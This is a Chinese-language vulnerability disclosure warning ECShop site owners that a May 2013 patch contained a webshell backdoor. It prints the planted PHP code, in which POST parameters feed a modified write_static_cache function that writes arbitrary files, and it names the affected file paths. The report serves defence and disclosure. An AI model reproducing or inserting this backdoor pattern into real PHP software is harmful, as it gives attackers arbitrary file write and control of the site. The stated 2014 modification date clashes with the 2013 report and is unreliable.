ecshop最新补丁含有webshell，请各位站长注意！

### 简要描述： ecshop最新（2013年5月6日）补丁含有后门，请各位站长注意！补丁地址http://bbs.ecshop.com/viewthread.php?tid=1129622 下载过的请及时处理。同时希望官方以公告方式告知！ ### 详细说明： 官方已经停止了补丁的下载。我是从第三方 下载的补丁(ecmoban.com)下载的补丁 我开始以为是第三方故意写的后门于是联系了 ecmoban的人员。确定是ec论坛被挂马导致的 shell位置 includes\fckeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php ``` @include("../../../../../../lib_base.php"); $newname = $_POST['newname']; $newfile = $_POST['newfile']; write_static_cache($cache_name,$caches,$newname,$newfile); ``` 同时这位黑阔还修改了lib_base.php文件的write_static_cache方法 ``` function write_static_cache($cache_name,$caches,$newname,$newfile) { if (!empty($cache_name)){ if ((DEBUG_MODE & 2) == 2) { return false; } $cache_file_path = ROOT_PATH . '/temp/static_caches/' . $cache_name . '.php'; $content = "<?php\r\n"; $content .= "\$data = " . var_export($caches, true) . ";\r\n"; $content .= "?>"; file_put_contents($cache_file_path, $content, LOCK_EX); }else{ @file_put_contents($newfile, $newname); } } ``` 基本上文件修改时间是2014年12月25日的都动过手脚！ ### 漏洞证明： 下图 是我和模板堂的朋友得到的确认消息 [<img src="https://images.seebug.org/upload/201305/30120311d2c4e36edd038163176d9247246d89fb.jpg" alt="dd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/30120311d2c4e36edd038163176d9247246d89fb.jpg) [<img src="https://images.seebug.org/upload/201305/3012043769d0f453e3c38a9009dfe55d3aade3cb.jpg" alt="dd2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/3012043769d0f453e3c38a9009dfe55d3aade3cb.jpg)